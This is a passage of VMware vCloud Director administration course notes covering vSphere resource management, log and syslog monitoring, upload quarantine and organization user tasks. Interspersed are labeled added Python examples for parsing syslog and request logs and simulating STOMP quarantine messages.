Managing vCenter Server Systems

Slide 8-6

There are many things that can be done from the vCloud Director > Manage & Monitor panel concerning vCenter Server systems. Possible actions include:

• Reconnect to the vCenter Server system

• Refresh information from the vCenter Server system (other than VMware vSphere® storage policies)

• Refresh information on vSphere storage policies

• Enable or disable a specific vCenter Server system

• Detach a specific vCenter Server system

• Change the connection information or the name of the vCenter Server system as it appears in vCloud Director

Reconnect to a vCenter Server system.

Refresh information from a vCenter Server system.

Refresh available storage profiles.

Enable or disable a vCenter Server system.

Detach a vCenter Server system.

Open the VMware vSphere Web Client.

Change connection information or name of a vCenter Server system.

Manage & Monitor > vCenters > <vCenter_Server_system>


Before you upgrade a vCenter Server system that is attached to vCloud Director, you must prepare the vCenter Server system by using the following procedure:

1. Disable the vCenter Server system in vCloud Director. Wait for the status to change to Disabled.

2. Upgrade the vCenter Server system using the standard vCenter Server upgrade procedure.

3. After the upgrade on the vCenter Server system is finished, go back to the vCloud Director Web console, right-click the vCenter Server name, and select Enable.

4. Reregister the vCloud Director with the upgraded vCenter Server system before you start using it.

Managing Resource Pools at the vSphere Level (1)

Slide 8-7

Every provider virtual data center (VDC) in a vCloud Director installation requires a unique resource pool in vSphere to provide its compute and memory resources. You must create and configure resource pools in vSphere before you can add them to a provider VDC, but you can view information about the resource pools that vCloud Director uses.

You can view information about the used and total CPU and memory reservations for a resource pool. You can also view information about the datastores that are available to the resource pool.

To view the resource pool properties, go to the Manage & Monitor tab and select Resource Pools > resource pool name > Properties.

Here you can see information on a specific resource pool. The information includes:

• Name of the resource pool

• Memory reservation used / total

• CPU reservation used / total

• Datastores that are available to this resource pool

• Name of each datastore

• Datastore type

• Whether the datastore is connected

• Datastore capacity

• Percentage of space used in the datastore

You can view information about the resource pools that vCloud Director uses.

Manage & Monitor > Resource Pools

Managing Resource Pools at the vSphere Level (2)

Slide 8-8

The best practice is for each resource pool to be an entire cluster that is dedicated to a provider VDC.

Even though it is not the best practice, you can have multiple resource pools on a single cluster, with each resource pool being assigned to a different provider VDC. However, this design makes it easy to overcommit resources. If you are going to use multiple resource pools in a single VMware vSphere® Distributed Resource Scheduler™ cluster, you will need to carefully monitor and manage utilization.

The type of settings used on the resource pool (reservations and limits) should be consistent with the allocation model that will be used in the organization VDC that leverages each resource pool. Resource pools created to support Pay-As-You-Go organization VDCs will always have no reservations or limits. Pay-As-You-Go settings only affect overcommitment. A 100-percent guarantee means no overcommitment is possible. The lower the percentage, the more overcommitment is possible.

The best practice is for each resource pool to be an entire cluster that is dedicated to a provider virtual data center (VDC).

Multiple resource pools can be on a single cluster, with each resource pool assigned to a provider. Resources can be overcommitted, so carefully manage the resources to minimize the potential negative effect.

Reservations and limits should be consistent with the allocation model that will be used in the organization VDC that leverages the pool.

A hierarchical resource pool is not supported with vCloud Director.

Redeploying All Virtual Machines on a Host

Slide 8-9

You can move all the virtual machines from one VMware® ESXi™ host to other ESXi hosts in the same cluster. This ability is useful to unprepare a host, or to perform maintenance on a host without affecting running virtual machines.

Disable the host before you redeploy its virtual machines. When you select Redeploy All VMs, vCloud Director puts the host into maintenance mode and moves all of its virtual machines to other hosts in the same cluster.

You redeploy all virtual machines on a host when doing the following:

Performing maintenance on the host

Moving all the virtual machines from one host to another in the same cluster

You must disable the host first.

Redeploy all virtual machines. vCenter Server puts this host into maintenance mode.

Manage & Monitor > Hosts > <host_name> > Redeploy All VMs

When to Disable a Host

Slide 8-10

You can disable a host to prevent VMware vSphere® vApps™ from starting up on the host. Virtual machines that are already running on the host are not affected.

NOTE

vCloud Director enables or disables the host for all provider VDCs that use its resources.

To prevent VMware vSphere® vApps from starting on the host

To perform maintenance

Manage & Monitor > Hosts > <host_name> > Disable Host

Managing Datastores and Datastore Clusters

Slide 8-11

The vCloud Director Manage & Monitor panel reports all available datastores and datastore clusters. In order to take a datastore or a datastore cluster down for maintenance, you should disable it first. After a datastore or datastore cluster has been disabled, no vApps that are assigned to it can be powered on and no vApps can be created on it.

Disable a datastore or a datastore cluster for maintenance. No vApps will start on it and no vApps will be created on it.

Low Disk Space Warnings for a Datastore

Slide 8-12

You can configure low disk space warnings on a datastore. vCloud Director issues a warning email when the datastore reaches a specific threshold of available capacity. These warnings alert you to a low disk situation before it becomes a problem.

vCloud Director allows you to set two thresholds: yellow and red. When vCloud Director sends an email alert, the message indicates which threshold was crossed. The yellow threshold determines the point at which fast provisioning will stop initiating shadow virtual machine creation.

vCloud Director will send an email alert when the datastore crosses the specified threshold.

Email alert is sent when the datastore crosses the threshold.

Manage & Monitor > Datastores & Datastore Clusters > <datastore_name> > Properties

Virtual Machine Migration Between Datastores

Slide 8-13

What if a datastore runs out of space? How do you move running virtual machines from one datastore to another one?

Although it is possible to manually migrate running virtual machines from one datastore to another in the vSphere Web Client, this can cause problems for vCloud Director vApps and is not recommended. Instead, you should use VMware vSphere® Storage DRS™ to move powered-on virtual machines that are part of vCloud Director vApps from one datastore to another. To do this, the datastore must already be part of a datastore cluster.

First, vSphere Storage DRS must already be configured in the DRS cluster. Both the datastore you want to evacuate and other migration candidate datastores must be in a datastore cluster. Use the vSphere Web Client to place the datastore into Storage DRS Maintenance Mode. vSphere will automatically move all virtual machines off of that datastore and onto other datastores in the datastore cluster.

Virtual machines can be moved from one datastore to another datastore by VMware vSphere® Storage DRS.

Both datastores should be part of a datastore cluster.

Place the datastore into vSphere Storage DRS maintenance mode in the vSphere Web Client.

Virtual machines are automatically moved to other datastores in the datastore cluster.


If you do not already have the vSphere Web Client open, all submenus in the vCloud Director Manage & Monitor panel under vSphere Resources have an option to open the vSphere Web Client.

Storage Policies Attached to a Datastore

Slide 8-14

You can determine exactly which vSphere storage policies are attached to a specific datastore by using Manage & Monitor > Datastores & Datastore Clusters > <datastore_name> > Properties > Storage Policies. The panel allows you to search for a specific vSphere storage policy if the vCenter Server system is configured with a large number of vSphere storage policies. The panel will also report how much storage space on the selected datastore is being actively used by the vSphere storage policy.

Manage & Monitor > Datastores & Datastore Clusters > <datastore_name> > Properties > Storage Profiles

Storage Policy Information

Slide 8-15

Manage & Monitor > Storage Policies will report all of the vSphere storage policies available to the system. The panel also reports the number of VDCs using each vSphere storage policy (both provider and organization), the number of datastores in each vSphere storage policy, and how much space has been used, provisioned, and requested.

Number of provider VDCs attached

Number of organization VDCs attached

Space: used, provisioned, and requested

Number of datastores in the storage profile

Manage & Monitor > Storage Profiles

Listing Datastores Assigned to Storage Policies

Slide 8-16

You have already seen that each datastore can report all of the vSphere storage policies that have been attached to it. It is also possible to get a list of all of the datastores assigned to a specific vSphere storage policy.

Manage & Monitor > Storage Profiles > <policy_name> > Properties

Available Distributed Switches

Slide 8-17

Manage & Monitor > Switches & Port Groups will report all of the distributed switches that are available in the system. This is information-only. There is no way to configure or change these switches from this menu.

Manage & Monitor > Switches & Port Groups

Switches and Port Groups

Slide 8-18

Manage & Monitor > Switches & Port Groups > Port Groups reports all of the port groups in use on a distributed switch. This panel gives important information that correlates which cloud networks are associated with which port groups.

Switches & Port Groups lists all vCenter Server virtual switches and port groups, including those created by vCloud Director:

Type: Distributed or standard

 Associated cloud network

Type of cloud network

Manage & Monitor > Switches & Port Groups > Port Groups

Stranded Items

Slide 8-19

When you delete an object in vCloud Director and that object also exists in vSphere, vCloud Director attempts to delete the object from vSphere. In some situations, vCloud Director might not be able to delete the object in vSphere. If the attempted deletion fails, the object becomes stranded. You can view a list of stranded items and try again to delete them, or you can use the vSphere Client to delete the stranded objects in vSphere.

You can delete a stranded item to try to remove an object from vSphere that you already deleted from vCloud Director.

If vCloud Director cannot delete a stranded item, you can force delete it to remove it from the stranded items list. The stranded item continues to exist in vSphere.

Objects deleted from vCloud Director that still exist in vSphere appear as stranded items.

Manage & Monitor > Stranded Items > <stranded_item> > Delete

vSphere Client

Lab 14: Managing VMware vSphere Resources

Slide 8-20

Manage vSphere resources

Review of Learner Objectives

Slide 8-21

 You should be able to meet the following objectives:

Manage the following vSphere resources:

VMware® vCenter Server systems

Resource pools

VMware® ESXi hosts

vSphere datastores and datastore clusters

vSphere storage policies

Switches and port groups

Stranded items

Key Points

Slide 8-22

Modify vCenter Server settings to change connection information or name.

Before upgrading a vCenter Server system that is attached to vCloud Director, you must prepare the vCenter Server system by disabling it in vCloud Director.

Selecting Redeploy All VMs on the selected host allows vCloud Director to put the host into maintenance mode.

You can configure low disk space warnings on a datastore to receive an email from vCloud Director whenever the datastore reaches a specific threshold of available capacity.

Questions?

MODULE 9

Monitoring VMware vCloud Components

Slide 9-1

You Are Here

Slide 9-2

Course Introduction

VMware vCloud Director Architecture and Components

VMware vCloud Director Networking

VMware vCloud Director Providers

VMware vCloud Director Organizations

VMware vCloud Director Basic Security

Managing VMware vCloud Director Resources

Managing VMware vSphere Resources

Monitoring VMware vCloud Director Components

VMware vCloud Director Organization Users

VMware vCloud Director Installation

Importance

Slide 9-3

Monitoring VMware vCloud® components enables you to see the performance and availability of the VMware® vCloud Director® installation.

Monitoring enables you to keep the cloud running and avoid any major availability issues for the cloud users.

In this module, you will learn how to monitor vCloud components.

Learner Objectives

Slide 9-4

By the end of this module, you should be able to meet the following objectives:

Monitor provider and organization virtual data center use

View system-level and organization-level task and event logs

Enable debug display in task logs

Configure and synchronize Syslog server settings

Task Log

Slide 9-5

VMware® vCloud Director® tasks represent long-running operations, and their status changes as the task progresses. For example, a task's status generally starts as Running. When the task finishes, its status changes to Successful or Error.

Each task is associated with an owner. The owner is either system or a particular user account. All tasks with an indicated owner of system are initiated by vCloud Director to perform various operations, including housekeeping tasks. All tasks with a non-system owner were initiated by a given user account, such as a system administrator or organization administrator.

Each task log entry can be examined to view additional details about the operation. If relevant to the task performed, a list of associated VMware vSphere® tasks will also be available. When relevant vSphere tasks are listed, you can obtain further details about each task by selecting the entry and then choosing the Open in VMware vSphere® Web Client option under the Gear menu.

The system administrator can enable and disable the display of debug information in task log details. When this setting is enabled, debug information pertaining to the task is listed at the bottom of each task details page. Only the system administrator can change this setting. Debug information will only appear in the task details when viewed by a system administrator.

This setting does not control the logging of debug information. Enabling this setting simply means that debug information may be viewed for any logged task, regardless of when the task was performed.

Task logs are available at the system level and for each organization.

Related VMware vSphere® tasks are included when applicable.

Event Log

Slide 9-6

vCloud Director events represent one-time occurrences that typically indicate an important part of an operation or a significant state change for a vCloud Director object. For example, vCloud Director logs an event when a user initiates the creation of an organization virtual data center (VDC) and another event when the process completes. vCloud Director also logs an event every time a user logs in and notes whether the attempt was successful or not.

Each event has a target specification that identifies, by name, the vCloud Director infrastructure component or vCloud Director object that was the focus of the event. For login events, the target will be the name of the account being used to access the system.

In general, each event is associated with an owner. The owner is either system or a particular user account. All events with an indicated owner of system are initiated by vCloud Director to perform various operations, including housekeeping tasks. All events with a non-system owner were initiated by a given user account, such as a system administrator or organization administrator.

Each event log entry can be examined to view additional details about the event. Event details never include associated vSphere operations.

Event logs are available at the system level and for each organization.

Click an event to view its details.

Events do not have related vSphere tasks.

Log Activity Settings

Slide 9-7

The system administrator is responsible for configuring activity history settings. Activity history settings are applied system-wide and include the system logs and all organization logs. Organization administrators can neither view nor manage activity history settings.

The history shown time frame controls the volume of log data available when viewing logs in the vCloud Director console interface.

The history to keep time frame defines how long log entries are to be maintained by the system before being deleted.

The system administrator can also enable the display of task-related debug information. This setting is covered on the following page.

The system administrator configures activity settings.

How many days log entries are retained before being automatically deleted.

How many days log entries are available for viewing.

Inclusion of debug information when viewing task details.

 Activity settings apply to both the task and event logs.

Syslog Server for Cell Use

Slide 9-8

When you install vCloud Director, you can specify a Syslog server for cell use. An integrated Syslog collector is included with vSphere 5.1.

The Syslog server for cell use is specified when vCloud Director is installed.

 An integrated Syslog collector is included with vSphere 5.5.

 Any standard Syslog collector can be used.

Syslog Settings for Networks

Slide 9-9

You can configure up to two Syslog server IP addresses for networks to use. This setting does not apply to logging performed by cloud cells. The Syslog servers specified here are for use by edge gateways and VMware vSphere® vApp™ networks that have a firewall component. Unlike the Syslog server for cell use, which is configured during vCloud Director installation, the Syslog server settings for networks are configured after vCloud Director has been installed and deployed.

After configuring or changing the Syslog server settings for networks to use, those settings must be explicitly synchronized with each organization edge gateway and each running vApp network where logging is to occur. vApp networks and edge gateways created after the settings have been updated will automatically receive new or updated values.

vApp networks will not be updated when an upstream edge gateway is synchronized. Synchronization must be performed on each deployed vApp network or edge gateway where logging firewall rules have been configured.

The system administrator must explicitly configure Syslog settings fornetworks:

Can be the same Syslog server for cell use

Configured after vCloud Director has been installed and deployed

 Applies to edge gateways and VMware vSphere® vApp networks

Syslog servers for network use are required for firewall rule logging.

Changes to syslog server settings must be manually synchronized.

New edge gateways and vApp networks synchronize once automaticallywhen deployed.

Synchronizing at an edge gateway does not cause synchronization of vAppnetworks.

Synchronization must be performed for each edge gateway and each vAppnetwork where logging is to be performed.

 Any user with sufficient rights can synchronize settings.
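The slide says any standard Syslog collector can receive the cell logs and the edge gateway and vApp network firewall logs, and that a changed setting reaches an existing edge gateway or vApp network only after it has been explicitly synchronized. The Python below is an added example, not course material or VMware code: it parses RFC 3164 syslog lines the way a generic collector sees them and reports expected senders that have produced nothing, which is what a gateway that was never synchronized looks like from the collector's side. The sample lines, host names and message text are constructed; the message text is not the real vShield Edge log format.

```python
"""Minimal RFC 3164 syslog parser plus a "who is actually logging" check.

Added example, not course material or VMware code. Sample lines, host
names and message text are constructed; the firewall message text is
illustrative and is not the vShield Edge log format.
"""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional, Set

# RFC 3164 layout: "<PRI>Mmm dd hh:mm:ss HOSTNAME MESSAGE"
_SYSLOG_RE = re.compile(
    r"^<(?P<pri>\d{1,3})>"
    r"(?P<ts>[A-Z][a-z]{2} [ \d]\d \d\d:\d\d:\d\d) "
    r"(?P<host>\S+) "
    r"(?P<msg>.*)$"
)

SEVERITIES = ["emerg", "alert", "crit", "err", "warning", "notice", "info", "debug"]


@dataclass
class SyslogRecord:
    facility: int
    severity: str
    timestamp: str
    host: str
    message: str


def parse_syslog_line(line: str) -> Optional[SyslogRecord]:
    """Decode one RFC 3164 line; return None for lines that do not fit the layout."""
    m = _SYSLOG_RE.match(line.strip())
    if not m:
        return None
    pri = int(m.group("pri"))
    if pri > 191:  # PRI = facility * 8 + severity, and facility is at most 23
        return None
    return SyslogRecord(
        facility=pri // 8,
        severity=SEVERITIES[pri % 8],
        timestamp=m.group("ts"),
        host=m.group("host"),
        message=m.group("msg"),
    )


def silent_sources(lines: List[str], expected_hosts: Set[str]) -> Set[str]:
    """Expected senders from which the collector has received no valid line.
    After changing the network Syslog settings, any edge gateway listed here
    is a candidate for a missed synchronization."""
    seen = {rec.host for rec in map(parse_syslog_line, lines) if rec}
    return expected_hosts - seen


def severity_counts(lines: List[str]) -> Dict[str, int]:
    """Count parsed lines per severity, e.g. to spot a burst of firewall drops."""
    counts: Dict[str, int] = {}
    for rec in map(parse_syslog_line, lines):
        if rec:
            counts[rec.severity] = counts.get(rec.severity, 0) + 1
    return counts


# Constructed sample: one cell line, two edge-gateway firewall lines, one junk line.
SAMPLE_LINES = [
    "<14>Aug 10 12:00:01 vcd-cell-01 vcloud-container-info: cell started",
    "<12>Aug 10 12:00:05 edge-org-a firewall: DROP src=10.0.0.5 dst=10.0.1.9 proto=tcp dport=22",
    "<14>Aug 10 12:00:07 edge-org-a firewall: ACCEPT src=10.0.0.5 dst=10.0.1.9 proto=tcp dport=443",
    "this line is not syslog at all",
]

# Constructed inventory: edge-org-b has not been synchronized, so it is silent.
EXPECTED_EDGES = {"edge-org-a", "edge-org-b"}

if __name__ == "__main__":
    print("severity counts:", severity_counts(SAMPLE_LINES))
    print("silent edge gateways:", silent_sources(SAMPLE_LINES, EXPECTED_EDGES))
```

On a real collector, feed it the lines received since the settings were synchronized and the list of edge gateways that have firewall logging rules; a gateway that stays in the silent set is the one to resynchronize first.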

Monitoring Provider Virtual Data Centers (Slide 9-10)

You can monitor the utilization of each provider VDC separately and use that information to plan mitigation of any resource issues found.

For evaluating resource utilization, you can compare three different types of values: Used, Allocation, and Overhead. Compare these values to determine whether additional resources should be allotted and to monitor the overall utilization of each provider VDC. You can compare Memory, Storage, and Processor values.

Used percentages indicate the percentage of pool resources that are consumed by the provider VDC. Allocation indicates the percentage of pool resources committed to the provider VDC.

• Values for each provider virtual data center (VDC) are listed separately.
• Displayed columns can be customized.

Monitoring Provider Storage Policies and Datastores (Slide 9-11)

You can monitor the utilization of each storage policy used by a provider VDC. Compare the Used, Provisioned, and Requested values to determine which policies are overutilized or underutilized.

You can monitor the utilization of each datastore used by a provider VDC. Datastores cannot be managed directly in vCloud Director; instead, the containing storage policy must be managed. Compare the Used, Provisioned, and Requested values to determine which policies are overutilized or underutilized.

• Values for each storage policy used by the provider VDC are listed separately.
• Example: Determine which storage policies or datastores are underutilized.

Monitoring Organization VDCs (Slide 9-12)

You can monitor CPU, memory, and storage resources for each organization's VDC. If you see that resources are low, you can add more resources as needed.

• Values for each organization VDC are listed separately.
• Displayed columns can be customized.

Upload Quarantine (Slide 9-13)

Quarantine files are vApp templates and media files that users upload to their organization. vCloud Director enables you to monitor the quarantined files, but you must first enable upload quarantine and use third-party tools (for example, a virus scanner) to process the uploaded files before vCloud Director accepts them.

You can use any Java Message Service (JMS) client that understands the STOMP protocol to monitor and respond to messages from the vCloud Director quarantine service.

When an uploaded file is quarantined, a JMS broker sends a message to a request queue on a cloud cell. The receiver decides whether to accept or reject the upload by sending a message to a response queue.

For details, see the product documentation at www.vmware.com/support/pubs/vcd_pubs.html.

Each vCloud Director server host exposes a number of MBeans through Java Management Extensions (JMX). This exposure enables operational management of the server and provides access to internal statistics.

What are MBeans? MBeans are managed beans, Java objects that represent resources to be managed. An MBean has a management interface.

What is JMX? JMX is a Java technology that supplies tools for managing and monitoring applications, system objects, devices (for example, printers), and service-oriented networks. Those resources are represented by objects called MBeans.

• All vApps and media files uploaded by users are quarantined for a period of time.
• Quarantined uploads are not user-accessible until they are accepted by the system.
• Uploads that are not accepted within the specified timeout period are deleted.
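As an added illustration of the quarantine exchange described above (not course material or VMware code), the Python below encodes and decodes STOMP 1.2 frames and walks through one request-queue message and one response. The frame layout follows the STOMP 1.2 specification; the queue names, header set and JSON bodies are assumptions made for the example, not the vCloud Director message format, which is defined in the product documentation. The receiver fails closed: an upload for which the scanner has recorded no verdict is rejected.

```python
"""STOMP 1.2 frame codec and a simulated upload-quarantine exchange.

Added example, not course material or VMware code. Frame layout follows the
STOMP 1.2 specification. The queue names, headers and JSON bodies are
assumptions for the example and are not the vCloud Director message format.
"""
import json
import re
from typing import Dict, Tuple

NUL = b"\x00"
_ESCAPES = {"\\": "\\\\", "\r": "\\r", "\n": "\\n", ":": "\\c"}
_UNESCAPES = {"\\": "\\", "r": "\r", "n": "\n", "c": ":"}

# Assumed queue names (placeholders, not vCloud Director's real destinations).
REQUEST_QUEUE = "/queue/example.quarantine.request"
RESPONSE_QUEUE = "/queue/example.quarantine.response"


def encode_frame(command: str, headers: Dict[str, str], body: bytes = b"") -> bytes:
    """COMMAND line, header lines, blank line, body, NUL. Header values are
    escaped per STOMP 1.2; content-length is added so a body may contain NUL."""
    lines = [command]
    for key, value in headers.items():
        lines.append(key + ":" + "".join(_ESCAPES.get(ch, ch) for ch in value))
    if "content-length" not in headers:
        lines.append(f"content-length:{len(body)}")
    return "\n".join(lines).encode("utf-8") + b"\n\n" + body + NUL


def decode_frame(raw: bytes) -> Tuple[str, Dict[str, str], bytes]:
    """Inverse of encode_frame. The first occurrence of a repeated header wins,
    as the specification requires."""
    if not raw.endswith(NUL):
        raise ValueError("frame is not NUL-terminated")
    head, sep, body = raw[:-1].partition(b"\n\n")
    if not sep:
        raise ValueError("frame has no header/body separator")
    command, *header_lines = head.decode("utf-8").split("\n")
    headers: Dict[str, str] = {}
    for line in header_lines:
        key, _, value = line.partition(":")
        unescaped = re.sub(r"\\(.)", lambda m: _UNESCAPES.get(m.group(1), m.group(0)), value)
        headers.setdefault(key, unescaped)
    if "content-length" in headers:
        body = body[: int(headers["content-length"])]
    return command, headers, body


def quarantine_request(upload_id: str, path: str) -> bytes:
    """What the broker's request-queue MESSAGE could carry (assumed body layout)."""
    body = json.dumps({"uploadId": upload_id, "path": path}).encode("utf-8")
    return encode_frame("MESSAGE", {
        "destination": REQUEST_QUEUE,
        "message-id": upload_id,
        "content-type": "application/json",
    }, body)


def decide(request_frame: bytes, scan_verdicts: Dict[str, bool]) -> bytes:
    """Receiver side: look up the scanner's verdict for the quarantined file and
    answer on the response queue. Fail closed: no verdict means reject."""
    command, headers, body = decode_frame(request_frame)
    if command != "MESSAGE" or headers.get("destination") != REQUEST_QUEUE:
        raise ValueError("not a quarantine request")
    request = json.loads(body.decode("utf-8"))
    clean = scan_verdicts.get(request["path"], False)
    reply = {"uploadId": request["uploadId"], "action": "accept" if clean else "reject"}
    return encode_frame("SEND", {
        "destination": RESPONSE_QUEUE,
        "content-type": "application/json",
    }, json.dumps(reply).encode("utf-8"))


def response_action(response_frame: bytes) -> str:
    """The action carried by a response frame ('accept' or 'reject')."""
    command, headers, body = decode_frame(response_frame)
    if command != "SEND" or headers.get("destination") != RESPONSE_QUEUE:
        raise ValueError("not a quarantine response")
    return json.loads(body.decode("utf-8"))["action"]


# Constructed sample: one upload scanned clean, a second one never scanned.
SAMPLE_VERDICTS = {"/transfer/u-100/template.ovf": True}

if __name__ == "__main__":
    for upload_id, path in (("u-100", "/transfer/u-100/template.ovf"),
                            ("u-101", "/transfer/u-101/tool.iso")):
        frame = decide(quarantine_request(upload_id, path), SAMPLE_VERDICTS)
        print(upload_id, response_action(frame))
```

Against a real broker the same `encode_frame` output is what goes on the wire after CONNECT/SUBSCRIBE; the decision function is the only part that needs to change, to consult the scanner that actually processed the file.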

Viewing vCloud Director Logs (Slide 9-14)

vCloud Director provides logging information for each cloud cell in the system. You can view the logs to monitor your cells and to troubleshoot issues.

You can find the logs for a cell at /opt/vmware/vcloud-director/logs.

Log name                     What the log shows
cell.log                     Console output from the vCloud Director cell
vcloud-container-debug.log   Debug-level log messages from the cell
vcloud-container-info.log    Warnings or errors encountered by the cell
vmware-vcd-watchdog.log      When the cell crashed, restarted, and so on
diagnostics.log              Diagnostics information (must first be enabled in the local logging configuration)
YYYY_MM_DD.request.log       HTTP request logs in the Apache common log format

To view these logs, go to /opt/vmware/vcloud-director/logs.
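The request log is the one file in the table with a documented format, so it is the natural input for detection logic. The Python below is an added example, not part of the course or of vCloud Director: it parses Apache common log format lines and counts 401 and 403 responses per client address, which surfaces a client that keeps failing to authenticate. The log lines, the request paths and the failure threshold are constructed for the example.

```python
"""Parse YYYY_MM_DD.request.log lines (Apache common log format) and flag noisy clients.

Added example, not course material or VMware code. The sample lines and the
threshold are constructed.
"""
import re
from collections import defaultdict
from typing import Dict, List, Optional

# Apache common log format: host ident authuser [date] "request" status bytes
_CLF_RE = re.compile(
    r'^(?P<host>\S+) (?P<ident>\S+) (?P<user>\S+) \[(?P<time>[^\]]+)\] '
    r'"(?P<request>[^"]*)" (?P<status>\d{3}) (?P<bytes>\d+|-)$'
)


def parse_clf(line: str) -> Optional[dict]:
    """Return the fields of one line, with status/bytes as ints and the
    request split into method and path; None for lines that do not parse."""
    m = _CLF_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    rec["bytes"] = 0 if rec["bytes"] == "-" else int(rec["bytes"])
    parts = rec["request"].split(" ")
    rec["method"] = parts[0] if parts else ""
    rec["path"] = parts[1] if len(parts) > 1 else ""
    return rec


def auth_failures_by_host(lines: List[str]) -> Dict[str, int]:
    """Count 401 (unauthenticated) and 403 (forbidden) responses per client address."""
    counts: Dict[str, int] = defaultdict(int)
    for rec in map(parse_clf, lines):
        if rec and rec["status"] in (401, 403):
            counts[rec["host"]] += 1
    return dict(counts)


def noisy_clients(lines: List[str], threshold: int = 3) -> List[str]:
    """Clients with at least `threshold` authentication failures (constructed threshold)."""
    return sorted(h for h, n in auth_failures_by_host(lines).items() if n >= threshold)


# Constructed sample lines in the common log format; addresses are documentation ranges.
SAMPLE_LOG = [
    '192.0.2.10 - - [10/Aug/2019:12:00:01 +0000] "POST /api/sessions HTTP/1.1" 401 0',
    '192.0.2.10 - - [10/Aug/2019:12:00:02 +0000] "POST /api/sessions HTTP/1.1" 401 0',
    '192.0.2.10 - - [10/Aug/2019:12:00:03 +0000] "POST /api/sessions HTTP/1.1" 401 0',
    '192.0.2.10 - - [10/Aug/2019:12:00:04 +0000] "POST /api/sessions HTTP/1.1" 200 1523',
    '198.51.100.7 - - [10/Aug/2019:12:00:05 +0000] "GET /cloud/org/acme HTTP/1.1" 200 8831',
    '198.51.100.7 - - [10/Aug/2019:12:00:06 +0000] "GET /api/admin HTTP/1.1" 403 0',
    'garbage that is not a log line',
]

if __name__ == "__main__":
    print("failures per client:", auth_failures_by_host(SAMPLE_LOG))
    print("clients over threshold:", noisy_clients(SAMPLE_LOG))
```

On a cell, point it at the current day's file under /opt/vmware/vcloud-director/logs; the per-client counts are the number to trend, and a client that fails several times and then succeeds (as 192.0.2.10 does in the sample) is the pattern worth a closer look.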

Lab 15: Monitoring Cloud Components (Slide 9-15)

Monitor cloud components

Review of Learner Objectives (Slide 9-16)

You should be able to meet the following objectives:
• Monitor provider and organization virtual data center use
• View system-level and organization-level task and event logs
• Enable debug display in task logs
• Configure and synchronize Syslog server settings

Key Points (Slide 9-17)

You can monitor completed and in-progress operations and view resource usage information at the following levels:
• Provider VDC
• Organization VDC
• Storage policy
• Datastore

You can monitor CPU, memory, and storage resources for each organization VDC.

vCloud Director provides logging information for each cloud cell in the system.

Questions?

Module 10: VMware vCloud Director Organization Users (Slide 10-1)

You Are Here (Slide 10-2)

• Course Introduction
• VMware vCloud Director Architecture and Components
• VMware vCloud Director Networking
• VMware vCloud Director Providers
• VMware vCloud Director Organizations
• VMware vCloud Director Basic Security
• Managing VMware vCloud Director Resources
• Managing VMware vSphere Resources
• Monitoring VMware vCloud Director Components
• VMware vCloud Director Organization Users
• VMware vCloud Director Installation

Importance (Slide 10-3)

Organization users have access to a wide variety of configuration options and features based on their roles.

In this module, you will learn how to manage VMware vSphere® vApps from the point of view of an organization user.

Learner Objectives (Slide 10-4)

By the end of this module, you should be able to meet the following objectives:
• Share an organization catalog with other organization users
• Change ownership of a vApp
• Share a vApp with other organization users
• Force customization of a vApp
• Reset a vApp network

Sharing the Organization Catalog (Slide 10-5)

Catalogs can be created in a number of ways by different users. When a system administrator creates a catalog using the VMware® vCloud Director® console main menu, sharing options are not presented. The catalog will be visible to the organization administrator only and not shared with other organization users. Sharing of the catalog with other organization users must be explicitly configured after the catalog is created.

Catalogs created by any user, including the system administrator, using the New Catalog icon in the organization catalogs list can be configured for sharing as part of the catalog creation process. By default, catalogs created in this manner are not shared with other organization users. You must select the groups and users that will be able to access the catalog, or choose to share the catalog with all organization users.

• Catalogs that are created by the system administrator by using the VMware® vCloud Director® main menu are not automatically shared with organization users.
• The system administrator or organization administrator must explicitly configure catalog sharing for each catalog.
• Catalogs can be shared with other organizations.
• If catalogs are shared with another organization, all users in that organization have access.

Changing Ownership of a vApp (Slide 10-6)

Each user has a My Cloud container that shows all of the instantiated VMware vSphere® vApps™ the user has access to. vApps that appear in My Cloud are either owned by the user, have been shared with the user, or are listed because of the user's role, such as the organization administrator.

Ownership of a vApp can be transferred to any organization user with vApp User or above rights. A group of users cannot own management of an instantiated vApp. The system administrator, organization administrator, or the current vApp owner can change the ownership of a vApp.

• Ownership of a vApp can be changed by:
  • The system administrator
  • The organization administrator
  • The vApp owner
• Ownership of a vApp can be transferred to any user account.
• Ownership is singular; a group of users cannot own a vApp.

Sharing a vApp with Other Organization Users (Slide 10-7)

Many users can share access to an instantiated vApp, with management of the vApp being restricted to administrative roles and the vApp owner. vApps can be shared with other users by a system administrator, an organization administrator, or the vApp owner. The vApp will appear in the My Cloud container of all users that the vApp has been shared with.

• A vApp can be shared with:
  • All organization users
  • One or more specific organization users
• A vApp can be shared by:
  • The system administrator
  • The organization administrator
  • The vApp owner

My Cloud Visibility of vApps (Slide 10-8)

A vApp will appear in a user's My Cloud container when:
• The user owns the vApp
• The user is a system administrator
• The user is an organization administrator
• The vApp has been shared with the user

The Owner column can be used to determine which user is the actual owner of the vApp. This is most useful to the administrator roles, which have the most visibility.

• A vApp is visible in My Cloud for:
  • System administrators
  • Organization administrators
  • The vApp owner
  • Any account that the vApp has been shared with

Forcing Recustomization (Slide 10-9)

If the settings on a guest virtual machine are not in sync with vCloud Director, or an attempt to perform guest customization has failed, you can power on and force the recustomization of the virtual machine.

• A system or organization administrator can power on and force recustomization of a virtual machine in a vApp.
• This action is not applied at the vApp level. It must be executed per virtual machine.

Resetting a vApp Network (Slide 10-10)

If the network services, such as DHCP and NAT, are not working as expected, an organization administrator can reset the network. Network services are not unavailable while the reset is performed.

• A system or organization administrator can reset a deployed vApp network.
• The vApp network VMware® vShield Edge device is redeployed.

Lab 16: Organization Users (Slide 10-11)

Manage vApps as an organization user

Review of Learner Objectives (Slide 10-12)

You should be able to meet the following objectives:
• Share an organization catalog with other organization users
• Change ownership of a vApp
• Share a vApp with other organization users
• Force customization of a vApp
• Reset a vApp network

Key Points (Slide 10-13)

• Visibility of vApps in My Cloud is based on role, ownership, and sharing.
• Organization catalogs are not shared with all organization users by default.

Questions?

Module 11: VMware vCloud Director Installation (Slide 11-1)

You Are Here (Slide 11-2)

• Course Introduction
• VMware vCloud Director Architecture and Components
• VMware vCloud Director Networking
• VMware vCloud Director Providers
• VMware vCloud Director Organizations
• VMware vCloud Director Basic Security
• Managing VMware vCloud Director Resources
• Managing VMware vSphere Resources
• Monitoring VMware vCloud Director Components
• VMware vCloud Director Organization Users
• VMware vCloud Director Installation

